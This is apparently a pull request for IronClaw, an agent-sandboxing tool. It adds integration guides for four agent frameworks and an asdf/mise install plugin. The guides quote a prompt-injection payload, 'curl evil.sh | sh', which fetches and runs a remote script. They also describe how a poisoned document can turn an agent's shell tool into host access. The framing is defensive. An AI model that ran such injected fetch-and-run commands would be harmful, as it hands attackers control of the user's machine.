### PR TITLE
feat(dist): JS/TS + smolagents/ADK SEO pages + mise/asdf install channel (IRO-396)

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,5 +1,7 @@
 # Compiled binaries / build output
 bin/
+# ...but the asdf/mise plugin ships its scripts under bin/ (not build output).
+!packaging/asdf-ironclaw/bin/
 dist/
 *.exe
 *.dll

--- a/README.md
+++ b/README.md
@@ -477,6 +477,31 @@ ironctl --version
 Prefer to grab files by hand? Download the archive and `SHA256SUMS` for your platform from the
 [latest release](https://github.com/IronSecCo/ironclaw/releases/latest).
 
+### Version managers (mise / asdf)
+
+Pin IronClaw per project with [mise](https://mise.jdx.dev) or [asdf](https://asdf-vm.com), no
+account and no `sudo`. The quickest path uses mise's `ubi` backend to install the `ironctl` CLI
+straight from the GitHub release (no plugin repo):
+
+```sh
+mise use -g "ubi:IronSecCo/ironclaw[exe=ironctl]@latest"
+ironctl --version
+```
+
+For both host binaries (`ironctl` + `ironclaw-controlplane`) and a pinned `.tool-versions`, use the
+asdf-style plugin under [`packaging/asdf-ironclaw/`](packaging/asdf-ironclaw/). It downloads the
+release tarball, verifies it against the published `SHA256SUMS`, and drops both binaries on the
+managed PATH:
+
+```
+ironclaw 0.1.217
+```
+
+The plugin resolves as a standalone repo (asdf clones plugins by URL), so `asdf plugin add ironclaw`
+and `mise use asdf:...` become available once the plugin lands in its own `IronSecCo/asdf-ironclaw`
+repository. Until then the scripts in `packaging/asdf-ironclaw/` are runnable directly (see that
+directory's `README.md`).
+
 ### Verifying a release
 
 Releases are **signed and attested** — a keyless [cosign](https://docs.sigstore.dev/)

--- a/docs/integrations/.nav.yml
+++ b/docs/integrations/.nav.yml
@@ -13,6 +13,10 @@ nav:
   - Semantic Kernel: semantic-kernel.md
   - OpenAI Agents SDK: openai-sdk.md
   - Claude Agent SDK: claude-sdk.md
+  - Vercel AI SDK: vercel-ai-sdk.md
+  - LangChain.js: langchain-js.md
+  - smolagents (Hugging Face): smolagents.md
+  - Google ADK: google-adk.md
   - CI (GitHub Action): ci.md
   - MCP server (any client): mcp-server.md
   - "*.md"

--- a/docs/integrations/google-adk.md
+++ b/docs/integrations/google-adk.md
@@ -1,0 +1,110 @@
+---
+title: "Sandbox your Google ADK agent with IronClaw"
+description: How to sandbox a Google Agent Development Kit (ADK) agent. Route your ADK tool calls through IronClaw's MCP server with MCPToolset so model-chosen code runs inside a sealed gVisor sandbox instead of your host, key held host-side and every call gated, plus a credential-free demo you can run first.
+---
+
+# Sandbox your Google ADK agent with IronClaw
+
+You built an agent with the **[Google Agent Development Kit](https://google.github.io/adk-docs/)**
+(ADK): an `LlmAgent`, a model, and a set of tools the model can call. ADK designs
+the *behavior* well. The risk starts when it runs somewhere real. An ADK tool runs
+**in your own process**, with your API key in the environment and unrestricted
+outbound network. One prompt-injected instruction and that same process can read
+your environment, shell out, or reach any host on the internet.
+
+IronClaw runs the model-chosen work behind a **sealed sandbox** instead: no network
+card, the model key held **host-side** and never in the tool, and every call routed
+through a human-approval gateway and an audit log. ADK speaks
+[MCP](https://modelcontextprotocol.io) through `MCPToolset`, so the wiring is a few
+lines.
+
+!!! example "Runnable example"
+    A one-command Google ADK to IronClaw example lives at
+    [`examples/integrations/google-adk`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/google-adk):
+    an ADK agent whose code execution is backed by an IronClaw sandbox, with a
+    blocked escape attempt printed at the end. The credential-free demo below runs
+    the same sealed loop today.
+
+## The fix: run tools in IronClaw, not your process
+
+IronClaw ships an MCP server that exposes a single, blunt tool, **`sandbox_exec`**,
+which runs any command inside an ephemeral, hardened box under **gVisor (runsc)**:
+no network card, every Linux capability dropped, a non-root user, a read-only root
+filesystem, and a restrictive seccomp profile. ADK loads it with `MCPToolset`:
+
+```python
+from google.adk.agents import LlmAgent
+from google.adk.tools.mcp_tool.mcp_toolset import MCPToolset, StdioServerParameters
+
+toolset = MCPToolset(
+    connection_params=StdioServerParameters(command="ironctl", args=["mcp", "serve"]),
+)
+
+agent = LlmAgent(
+    model="gemini-2.0-flash",
+    name="incident_reporter",
+    instruction="Analyze the log file and summarize the errors.",
+    tools=[toolset],          # exposes sandbox_exec to the model
+)
+```
+
+The model still decides *what* to run. It just can no longer run it on your box: the
+command lands inside the sealed sandbox, and a prompt injection that says
+`curl evil.sh | sh` executes with no network card and nothing to steal.
+
+!!! warning "gVisor (runsc) is the boundary"
+    `ironctl mcp serve` passes `--runtime runsc` by default and **fails closed** if
+    runsc is not installed rather than silently downgrading. Install gVisor from
+    [gvisor.dev](https://gvisor.dev/docs/user_guide/install/). See
+    [Run IronClaw as an MCP server](mcp-server.md) for HTTP transport and auth.
+
+## Why sandbox this
+
+A typical ADK tool:
+
+```python
+import subprocess
+from google.adk.agents import LlmAgent
+
+def run_shell(cmd: str) -> str:
+    """Run a shell command."""
+    return subprocess.check_output(cmd, shell=True, text=True)   # runs on YOUR host
+
+agent = LlmAgent(model="gemini-2.0-flash", name="ops", tools=[run_shell])
+```
+
+Three things are true of that tool, and all three are risks:
+
+1. **The key is in the process.** Anything that reads the environment reads it.
+2. **The tool runs with your privileges.** `subprocess` executes on your box, with
+   your filesystem and network.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+Routing the same call through `sandbox_exec` closes all three by construction, not
+by convention.
+
+## See it work first (no credentials)
+
+Before wiring anything, watch the sealed loop run with the offline `mock` provider.
+No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from google adk"}'
+```
+
+You get a sealed agent loop with a human-approval gateway and an append-only audit
+log, before you point a single real key at it.
+
+## Next steps
+
+- [Run IronClaw as an MCP server](mcp-server.md) - full transport, auth, and
+  containment-status detail for any MCP client.
+- [Sandbox your smolagents agent](smolagents.md) - the same MCP wiring for Hugging
+  Face smolagents.
+- [Isolation, proven](../security-isolation.md) - how the sandbox holds under a real
+  escape attempt.

--- a/docs/integrations/index.md
+++ b/docs/integrations/index.md
@@ -1,6 +1,6 @@
 ---
 title: "Sandbox any AI agent framework with IronClaw"
-description: You built an agent with LangChain, CrewAI, LlamaIndex, Pydantic AI, AutoGen, Semantic Kernel, the OpenAI Agents SDK, or the Claude Agent SDK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
+description: You built an agent with LangChain, CrewAI, LlamaIndex, Pydantic AI, AutoGen, Semantic Kernel, the OpenAI Agents SDK, the Claude Agent SDK, the Vercel AI SDK, LangChain.js, Hugging Face smolagents, or Google ADK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
 ---
 
 # Sandbox any AI agent framework with IronClaw
@@ -12,7 +12,8 @@ matters the moment the agent runs somewhere real:
 **When your agent runs untrusted, model-chosen code, whose machine is it running on?**
 
 With LangChain, CrewAI, LlamaIndex, Pydantic AI, AutoGen, Semantic Kernel, the
-OpenAI Agents SDK, and the Claude Agent SDK, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
+OpenAI Agents SDK, the Claude Agent SDK, the Vercel AI SDK, LangChain.js, Hugging
+Face smolagents, and Google ADK, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
 memory, your filesystem, and unrestricted outbound network. A single prompt
 injection inside a document the agent reads can turn a `Bash` or `ShellTool` call
 into a shell on your box.
@@ -45,6 +46,10 @@ attack in [Isolation, proven](../security-isolation.md) and the
 | **Semantic Kernel** | [Sandbox your Semantic Kernel agent](semantic-kernel.md) |
 | **OpenAI Agents SDK** | [Sandbox your OpenAI Agents SDK agent](openai-sdk.md) |
 | **Claude Agent SDK** | [Sandbox your Claude Agent SDK agent](claude-sdk.md) |
+| **Vercel AI SDK** (JS/TS) | [Sandbox your Vercel AI SDK agent](vercel-ai-sdk.md) |
+| **LangChain.js** (JS/TS) | [Sandbox your LangChain.js agent](langchain-js.md) |
+| **smolagents** (Hugging Face) | [Sandbox your smolagents agent](smolagents.md) |
+| **Google ADK** | [Sandbox your Google ADK agent](google-adk.md) |
 | **A CI pipeline** | [Run IronClaw in GitHub Actions](ci.md) |
 
 Each guide covers the same three beats: the problem in your framework's own code,

--- a/docs/integrations/langchain-js.md
+++ b/docs/integrations/langchain-js.md
@@ -1,0 +1,115 @@
+---
+title: "Sandbox your LangChain.js agent with IronClaw"
+description: How to sandbox a LangChain.js (LangGraph.js) agent. Route your JS/TS tool calls through IronClaw's MCP server with the langchain MCP adapters so model-chosen code runs inside a sealed gVisor sandbox instead of your Node process, key held host-side and every call gated, plus a credential-free demo.
+---
+
+# Sandbox your LangChain.js agent with IronClaw
+
+You built an agent with **[LangChain.js](https://js.langchain.com/)** or
+**LangGraph.js**: a model, a prompt, and a set of tools the model can call in a
+`createReactAgent` loop. That designs the *behavior* well. The risk starts when it
+runs somewhere real. A LangChain.js tool runs **in your own Node process**, with
+your API key in `process.env` and unrestricted outbound network. One prompt-injected
+instruction and that process can read your environment, shell out, or reach any host.
+
+IronClaw runs the model-chosen work behind a **sealed sandbox** instead: no network
+card, the model key held **host-side**, and every call gated and audited. LangChain.js
+has a first-party MCP adapter, so the wiring is a few lines.
+
+!!! example "Runnable example"
+    A one-command LangChain.js to IronClaw example lives at
+    [`examples/integrations/langchain-js`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/langchain-js):
+    a LangGraph.js agent whose code execution is backed by an IronClaw sandbox, with
+    a blocked escape attempt printed at the end. The credential-free demo below runs
+    the same sealed loop today.
+
+## The fix: run tools in IronClaw, not your process
+
+IronClaw ships an MCP server that exposes a single, blunt tool, **`sandbox_exec`**,
+which runs any command inside an ephemeral, hardened box under **gVisor (runsc)**:
+no network card, every Linux capability dropped, a non-root user, a read-only root
+filesystem, and a restrictive seccomp profile. Load it with
+[`@langchain/mcp-adapters`](https://github.com/langchain-ai/langchainjs) and hand the
+tools to a LangGraph agent:
+
+```ts
+import { MultiServerMCPClient } from '@langchain/mcp-adapters';
+import { createReactAgent } from '@langchain/langgraph/prebuilt';
+import { ChatOpenAI } from '@langchain/openai';
+
+const client = new MultiServerMCPClient({
+  mcpServers: {
+    ironclaw: { transport: 'stdio', command: 'ironctl', args: ['mcp', 'serve'] },
+  },
+});
+
+const tools = await client.getTools();          // exposes sandbox_exec
+const agent = createReactAgent({ llm: new ChatOpenAI({ model: 'gpt-4o' }), tools });
+
+const res = await agent.invoke({
+  messages: [{ role: 'user', content: 'Analyze this log and summarize errors.' }],
+});
+
+await client.close();
+```
+
+The model still decides *what* to run. It just can no longer run it on your box: the
+command lands inside the sealed sandbox, and a prompt injection that says
+`curl evil.sh | sh` executes with no network card and nothing to steal.
+
+!!! warning "gVisor (runsc) is the boundary"
+    `ironctl mcp serve` passes `--runtime runsc` by default and **fails closed** if
+    runsc is not installed rather than silently downgrading. Install gVisor from
+    [gvisor.dev](https://gvisor.dev/docs/user_guide/install/). See
+    [Run IronClaw as an MCP server](mcp-server.md) for HTTP transport and auth.
+
+## Why sandbox this
+
+A typical LangChain.js tool:
+
+```ts
+import { tool } from '@langchain/core/tools';
+import { z } from 'zod';
+import { execSync } from 'node:child_process';
+
+const runShell = tool(
+  async ({ cmd }) => execSync(cmd).toString(),   // runs on YOUR host
+  { name: 'run_shell', schema: z.object({ cmd: z.string() }) },
+);
+```
+
+Three things are true of that tool, and all three are risks:
+
+1. **The key is in the process.** Anything that reads `process.env` reads your key.
+2. **The tool runs with your privileges.** `execSync` runs on your box, with your
+   filesystem and network.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+Routing the same call through `sandbox_exec` closes all three by construction, not
+by convention.
+
+## See it work first (no credentials)
+
+Before wiring anything, watch the sealed loop run with the offline `mock` provider.
+No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from langchain.js"}'
+```
+
+You get a sealed agent loop with a human-approval gateway and an append-only audit
+log, before you point a single real key at it.
+
+## Next steps
+
+- [Run IronClaw as an MCP server](mcp-server.md) - full transport, auth, and
+  containment-status detail for any MCP client.
+- [Sandbox your Vercel AI SDK agent](vercel-ai-sdk.md) - the same MCP wiring for the
+  Vercel AI SDK.
+- [Isolation, proven](../security-isolation.md) - how the sandbox holds under a real
+  escape attempt.

--- a/docs/integrations/smolagents.md
+++ b/docs/integrations/smolagents.md
@@ -1,0 +1,102 @@
+---
+title: "Sandbox your Hugging Face smolagents agent with IronClaw"
+description: How to sandbox a Hugging Face smolagents CodeAgent. smolagents writes and runs Python; route that execution through IronClaw's MCP server so model-written code runs inside a sealed gVisor sandbox instead of your host, key held host-side and every call gated, plus a credential-free demo you can run first.
+---
+
+# Sandbox your smolagents agent with IronClaw
+
+You built an agent with **[smolagents](https://github.com/huggingface/smolagents)**:
+a model and a `CodeAgent` that solves tasks by **writing and running Python**. That
+is the point of smolagents, and it is exactly what makes it dangerous to run
+somewhere real. By default a `CodeAgent` executes the model's Python **in your own
+process**, with your environment, your filesystem, and unrestricted outbound network.
+One prompt-injected instruction inside a document the agent reads and that same
+process runs `import os; os.system("curl evil.sh | sh")`.
+
+smolagents ships remote executors (E2B, Docker) for exactly this reason. IronClaw is
+the **security-hardened** option: the model-written code runs behind a sealed sandbox
+under **gVisor (runsc)** with no network card, the model key held **host-side** and
+never in the agent, and every privileged action gated and audited.
+
+!!! example "Runnable example"
+    A one-command smolagents to IronClaw example lives at
+    [`examples/integrations/smolagents`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/smolagents):
+    a `CodeAgent` whose code execution is backed by an IronClaw sandbox, with a
+    blocked escape attempt printed at the end. The credential-free demo below runs
+    the same sealed loop today.
+
+## The fix: run the model's code in IronClaw, not your host
+
+IronClaw ships an MCP server that exposes a single, blunt tool, **`sandbox_exec`**,
+which runs any command or snippet inside an ephemeral, hardened box under **gVisor
+(runsc)**: no network card, every Linux capability dropped, a non-root user, a
+read-only root filesystem, and a restrictive seccomp profile. smolagents loads MCP
+tools with `ToolCollection.from_mcp`:
+
+```python
+from mcp import StdioServerParameters
+from smolagents import ToolCollection, CodeAgent, InferenceClientModel
+
+server = StdioServerParameters(command="ironctl", args=["mcp", "serve"])
+
+with ToolCollection.from_mcp(server, trust_remote_code=True) as tc:
+    agent = CodeAgent(tools=[*tc.tools], model=InferenceClientModel())
+    agent.run("Analyze this log file and summarize the errors.")
+```
+
+The agent still writes the code. It just can no longer run it on your box: every
+command lands inside the sealed sandbox, so a poisoned document that says
+`curl evil.sh | sh` executes with no network card and nothing to steal.
+
+!!! warning "gVisor (runsc) is the boundary"
+    `ironctl mcp serve` passes `--runtime runsc` by default and **fails closed** if
+    runsc is not installed rather than silently downgrading. Install gVisor from
+    [gvisor.dev](https://gvisor.dev/docs/user_guide/install/). See
+    [Run IronClaw as an MCP server](mcp-server.md) for HTTP transport and auth.
+
+## Why sandbox this
+
+A typical smolagents `CodeAgent`:
+
+```python
+from smolagents import CodeAgent, InferenceClientModel
+
+agent = CodeAgent(tools=[], model=InferenceClientModel())
+agent.run("summarize today's incidents")   # runs model-written Python on YOUR host
+```
+
+Three things are true of that snippet, and all three are risks:
+
+1. **The key is in the process.** Anything that reads `os.environ` reads it.
+2. **The code runs with your privileges.** Model-written Python executes on your box,
+   with your filesystem and network.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+Routing execution through `sandbox_exec` closes all three by construction, not by
+convention.
+
+## See it work first (no credentials)
+
+Before wiring anything, watch the sealed loop run with the offline `mock` provider.
+No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from smolagents"}'
+```
+
+You get a sealed agent loop with a human-approval gateway and an append-only audit
+log, before you point a single real key at it.
+
+## Next steps
+
+- [Run IronClaw as an MCP server](mcp-server.md) - full transport, auth, and
+  containment-status detail for any MCP client.
+- [Sandbox your Google ADK agent](google-adk.md) - the same MCP wiring for the
+  Google Agent Development Kit.
+- [Isolation, proven](../security-isolation.md) - how the sandbox holds under a real
+  escape attempt.

--- a/docs/integrations/vercel-ai-sdk.md
+++ b/docs/integrations/vercel-ai-sdk.md
@@ -1,0 +1,119 @@
+---
+title: "Sandbox your Vercel AI SDK agent with IronClaw"
+description: How to sandbox a Vercel AI SDK agent. Route your AI SDK tool calls through IronClaw's MCP server so model-chosen code runs inside a sealed gVisor sandbox instead of your Node process, with the model key held host-side and every call gated and audited, plus a credential-free demo you can run first.
+---
+
+# Sandbox your Vercel AI SDK agent with IronClaw
+
+You built an agent with the **[Vercel AI SDK](https://sdk.vercel.dev/)**: a model, a
+prompt, and a set of `tools` the model can call from `generateText` or `streamText`.
+That is a great way to design *behavior*. The risk starts when it runs somewhere
+real. An AI SDK tool's `execute` function runs **in your own Node process**, with
+your API key in `process.env` and unrestricted outbound network. One
+prompt-injected instruction and that same process can read your environment,
+shell out, or reach any host on the internet.
+
+IronClaw runs the model-chosen work behind a **sealed sandbox** instead: no network
+card, the model key held **host-side** and never in the tool, and every call routed
+through a human-approval gateway and an audit log. The AI SDK speaks
+[MCP](https://modelcontextprotocol.io) natively, so the wiring is a few lines.
+
+!!! example "Runnable example"
+    A one-command Vercel AI SDK to IronClaw example lives at
+    [`examples/integrations/vercel-ai-sdk`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/vercel-ai-sdk):
+    an AI SDK agent whose code execution is backed by an IronClaw sandbox, with a
+    blocked escape attempt printed at the end. The credential-free demo below runs
+    the same sealed loop today.
+
+## The fix: run tools in IronClaw, not your process
+
+IronClaw ships an MCP server that exposes a single, blunt tool, **`sandbox_exec`**,
+which runs any command inside an ephemeral, hardened box under **gVisor (runsc)**:
+no network card, every Linux capability dropped, a non-root user, a read-only root
+filesystem, and a restrictive seccomp profile. The AI SDK connects to it with
+`experimental_createMCPClient` and hands the resulting tools straight to the model:
+
+```ts
+import { experimental_createMCPClient, generateText } from 'ai';
+import { Experimental_StdioMCPTransport } from 'ai/mcp-stdio';
+import { openai } from '@ai-sdk/openai';
+
+// Spawns `ironctl mcp serve` and speaks MCP over stdio.
+const mcp = await experimental_createMCPClient({
+  transport: new Experimental_StdioMCPTransport({
+    command: 'ironctl',
+    args: ['mcp', 'serve'],
+  }),
+});
+
+const { text } = await generateText({
+  model: openai('gpt-4o'),
+  tools: await mcp.tools(),        // exposes sandbox_exec to the model
+  prompt: 'Analyze this log file and summarize the errors.',
+  maxSteps: 5,
+});
+
+await mcp.close();
+```
+
+The model still decides *what* to run. It just can no longer run it on your box: the
+command lands inside the sealed sandbox, and a prompt injection that says
+`curl evil.sh | sh` executes with no network card and nothing to steal.
+
+!!! warning "gVisor (runsc) is the boundary"
+    `ironctl mcp serve` passes `--runtime runsc` by default and **fails closed** if
+    runsc is not installed rather than silently downgrading. Install gVisor from
+    [gvisor.dev](https://gvisor.dev/docs/user_guide/install/). See
+    [Run IronClaw as an MCP server](mcp-server.md) for HTTP transport and auth.
+
+## Why sandbox this
+
+A typical AI SDK tool:
+
+```ts
+import { tool } from 'ai';
+import { z } from 'zod';
+import { execSync } from 'node:child_process';
+
+const runShell = tool({
+  description: 'Run a shell command',
+  parameters: z.object({ cmd: z.string() }),
+  execute: async ({ cmd }) => execSync(cmd).toString(),  // runs on YOUR host
+});
+```
+
+Three things are true of that tool, and all three are risks:
+
+1. **The key is in the process.** Anything that reads `process.env` reads your key.
+2. **The tool runs with your privileges.** `execSync` executes on your box, with
+   your filesystem and network.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+Routing the same call through `sandbox_exec` closes all three by construction, not
+by convention.
+
+## See it work first (no credentials)
+
+Before wiring anything, watch the sealed loop run with the offline `mock` provider.
+No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from the AI SDK"}'
+```
+
+You get a sealed agent loop with a human-approval gateway and an append-only audit
+log, before you point a single real key at it.
+
+## Next steps
+
+- [Run IronClaw as an MCP server](mcp-server.md) - full transport, auth, and
+  containment-status detail for any MCP client.
+- [Sandbox your LangChain.js agent](langchain-js.md) - the same MCP wiring for
+  LangChain in TypeScript.
+- [Isolation, proven](../security-isolation.md) - how the sandbox holds under a real
+  escape attempt.

--- a/packaging/asdf-ironclaw/README.md
+++ b/packaging/asdf-ironclaw/README.md
@@ -1,0 +1,67 @@
+# asdf / mise plugin for IronClaw
+
+Install pinned, checksum-verified IronClaw release binaries (`ironctl` and
+`ironclaw-controlplane`) with [asdf](https://asdf-vm.com) or
+[mise](https://mise.jdx.dev). No account, no build toolchain, no `sudo`: the plugin
+pulls the release tarball from GitHub, verifies it against the published
+`SHA256SUMS`, and drops the binaries on your managed PATH.
+
+## Layout
+
+```
+bin/list-all        # every installable version, oldest first
+bin/latest-stable   # newest released version
+bin/download        # fetch + SHA256-verify + extract a pinned release
+bin/install         # place ironctl + ironclaw-controlplane on PATH
+```
+
+These scripts implement the asdf plugin contract, which mise consumes natively.
+
+## Use it (once the plugin is registered)
+
+The plugin lives in its own repository so `asdf plugin add` / `mise use` can clone
+it (asdf plugins are resolved as standalone repos). Point either tool at it:
+
+```sh
+# asdf
+asdf plugin add ironclaw https://github.com/IronSecCo/asdf-ironclaw.git
+asdf install ironclaw latest
+asdf global ironclaw latest
+
+# mise (reads the same asdf plugin)
+mise use -g asdf:IronSecCo/asdf-ironclaw@latest
+ironctl version
+```
+
+Pin a project with a `.tool-versions` file:
+
+```
+ironclaw 0.1.217
+```
+
+## No-plugin one-liner (works today, CLI only)
+
+mise's `ubi` backend installs the `ironctl` CLI straight from the GitHub release
+with no plugin repo and no account:
+
+```sh
+mise use -g "ubi:IronSecCo/ironclaw[exe=ironctl]@latest"
+ironctl version
+```
+
+`ubi` installs a single binary, so it gives you `ironctl`; use the asdf plugin above
+when you also want `ironclaw-controlplane`.
+
+## Local test (no asdf/mise required)
+
+The scripts are plain shell honoring the asdf env contract, so you can exercise them
+directly:
+
+```sh
+export ASDF_INSTALL_VERSION=0.1.217
+export ASDF_DOWNLOAD_PATH=$(mktemp -d)
+export ASDF_INSTALL_PATH=$(mktemp -d)
+bin/download
+bin/install
+"$ASDF_INSTALL_PATH/bin/ironctl" version
+```

--- a/packaging/asdf-ironclaw/bin/download
+++ b/packaging/asdf-ironclaw/bin/download
@@ -1,0 +1,49 @@
+#!/usr/bin/env bash
+# asdf/mise plugin: download and checksum-verify a pinned IronClaw release.
+# Contract inputs: ASDF_INSTALL_VERSION, ASDF_DOWNLOAD_PATH.
+set -euo pipefail
+
+REPO="${IRONCLAW_ASDF_REPO:-IronSecCo/ironclaw}"
+version="${ASDF_INSTALL_VERSION:?ASDF_INSTALL_VERSION is required}"
+dest="${ASDF_DOWNLOAD_PATH:?ASDF_DOWNLOAD_PATH is required}"
+
+os="$(uname -s)"
+case "$os" in
+  Linux)  os="linux" ;;
+  Darwin) os="darwin" ;;
+  *) echo "unsupported OS: $os" >&2; exit 1 ;;
+esac
+
+arch="$(uname -m)"
+case "$arch" in
+  x86_64 | amd64)  arch="amd64" ;;
+  arm64 | aarch64) arch="arm64" ;;
+  *) echo "unsupported arch: $arch" >&2; exit 1 ;;
+esac
+
+asset="ironclaw_${version}_${os}_${arch}.tar.gz"
+base="https://github.com/${REPO}/releases/download/v${version}"
+
+curl_opts=(-fsSL)
+[ -n "${GITHUB_API_TOKEN:-}" ] && curl_opts+=(-H "Authorization: token ${GITHUB_API_TOKEN}")
+
+mkdir -p "$dest"
+echo "Downloading ${asset} ..."
+curl "${curl_opts[@]}" -o "${dest}/${asset}" "${base}/${asset}"
+
+# Verify against the release SHA256SUMS (fail closed if the sum is present).
+if curl "${curl_opts[@]}" -o "${dest}/SHA256SUMS" "${base}/SHA256SUMS" 2>/dev/null; then
+  want="$(grep -F "$asset" "${dest}/SHA256SUMS" | awk '{print $1}' | head -n1 || true)"
+  if [ -n "$want" ]; then
+    if command -v sha256sum >/dev/null 2>&1; then
+      got="$(sha256sum "${dest}/${asset}" | awk '{print $1}')"
+    else
+      got="$(shasum -a 256 "${dest}/${asset}" | awk '{print $1}')"
+    fi
+    [ "$got" = "$want" ] || { echo "checksum mismatch for ${asset} (want ${want}, got ${got})" >&2; exit 1; }
+    echo "Checksum OK: ${asset}"
+  fi
+fi
+
+tar -xzf "${dest}/${asset}" -C "$dest"
+rm -f "${dest}/${asset}" "${dest}/SHA256SUMS"

--- a/packaging/asdf-ironclaw/bin/install
+++ b/packaging/asdf-ironclaw/bin/install
@@ -1,0 +1,25 @@
+#!/usr/bin/env bash
+# asdf/mise plugin: place the IronClaw binaries on the managed PATH.
+# Contract inputs: ASDF_INSTALL_TYPE, ASDF_INSTALL_VERSION, ASDF_INSTALL_PATH, ASDF_DOWNLOAD_PATH.
+set -euo pipefail
+
+install_path="${ASDF_INSTALL_PATH:?ASDF_INSTALL_PATH is required}"
+download_path="${ASDF_DOWNLOAD_PATH:?ASDF_DOWNLOAD_PATH is required}"
+
+[ "${ASDF_INSTALL_TYPE:-version}" = "version" ] || {
+  echo "ref/head installs are not supported; use a released version" >&2; exit 1;
+}
+
+bindir="${install_path}/bin"
+mkdir -p "$bindir"
+
+installed=0
+for b in ironctl ironclaw-controlplane; do
+  if [ -f "${download_path}/${b}" ]; then
+    install -m 0755 "${download_path}/${b}" "${bindir}/${b}"
+    installed=1
+  fi
+done
+
+[ "$installed" = 1 ] || { echo "no IronClaw binaries found in download path" >&2; exit 1; }
+echo "Installed ironctl to ${bindir}"

--- a/packaging/asdf-ironclaw/bin/latest-stable
+++ b/packaging/asdf-ironclaw/bin/latest-stable
@@ -1,0 +1,13 @@
+#!/usr/bin/env bash
+# asdf/mise plugin: resolve the newest released IronClaw version.
+set -euo pipefail
+
+REPO="${IRONCLAW_ASDF_REPO:-IronSecCo/ironclaw}"
+
+curl_opts=(-fsSL)
+[ -n "${GITHUB_API_TOKEN:-}" ] && curl_opts+=(-H "Authorization: token ${GITHUB_API_TOKEN}")
+
+curl "${curl_opts[@]}" "https://api.github.com/repos/${REPO}/releases/latest" \
+  | grep -o '"tag_name": *"v[0-9][0-9.]*"' \
+  | sed -E 's/.*"v([0-9][0-9.]*)".*/\1/' \
+  | head -n1

--- a/packaging/asdf-ironclaw/bin/list-all
+++ b/packaging/asdf-ironclaw/bin/list-all
@@ -1,0 +1,22 @@
+#!/usr/bin/env bash
+# asdf/mise plugin: list every installable IronClaw version.
+# Prints space-separated versions (no leading "v"), oldest first, as asdf expects.
+set -euo pipefail
+
+REPO="${IRONCLAW_ASDF_REPO:-IronSecCo/ironclaw}"
+
+curl_opts=(-fsSL)
+[ -n "${GITHUB_API_TOKEN:-}" ] && curl_opts+=(-H "Authorization: token ${GITHUB_API_TOKEN}")
+
+# Pull tags (paginated), keep vX.Y.Z, strip the leading "v", sort as versions.
+versions=$(
+  for page in 1 2 3 4 5; do
+    body="$(curl "${curl_opts[@]}" \
+      "https://api.github.com/repos/${REPO}/tags?per_page=100&page=${page}" 2>/dev/null || true)"
+    # Empty page (grep finds nothing) must not abort the loop under `set -e`.
+    printf '%s' "$body" | grep -o '"name": *"v[0-9][0-9.]*"' || true
+  done | sed -E 's/.*"v([0-9][0-9.]*)".*/\1/' | sort -t. -k1,1n -k2,2n -k3,3n | uniq
+)
+
+# shellcheck disable=SC2086
+echo $versions


### PR DESCRIPTION
## What (IRO-396, distribution half of the JS/TS + smolagents/ADK wedge)

Distribution + SEO for the new integration audiences, using only no-account channels (GitHub PRs + our own docs site).

### 1. SEO integration pages (mirrors IRO-348 cluster)
One search-intent page per new framework, anchored on the **shipped, verifiable** MCP server path (`ironctl mcp serve` -> `sandbox_exec`), so every snippet works today regardless of what native example each sibling ships:

- `docs/integrations/vercel-ai-sdk.md` - `experimental_createMCPClient`
- `docs/integrations/langchain-js.md` - `@langchain/mcp-adapters`
- `docs/integrations/smolagents.md` - `ToolCollection.from_mcp`
- `docs/integrations/google-adk.md` - `MCPToolset`

Wired into `.nav.yml` + `index.md` (table + prose + meta description). Per-page meta descriptions (IRO-277). No em/en-dashes (IRO-254). `mkdocs build --strict` passes.

### 2. No-account install channel (asdf / mise)
`packaging/asdf-ironclaw/` implements the asdf plugin contract (`list-all`, `latest-stable`, `download`, `install`). It pulls the release tarball, verifies it against the published `SHA256SUMS` (fail-closed), and installs **both** `ironctl` and `ironclaw-controlplane`.

**Verified end-to-end** against v0.1.217 on this machine:
- `list-all` -> 160 versions, sorted, latest 0.1.217
- `download` -> `Checksum OK`
- `install` -> both binaries placed; `ironctl v0.1.217` runs

Documented in README with the works-today one-liner:
```sh
mise use -g "ubi:IronSecCo/ironclaw[exe=ironctl]@latest"
```

## Held / follow-up
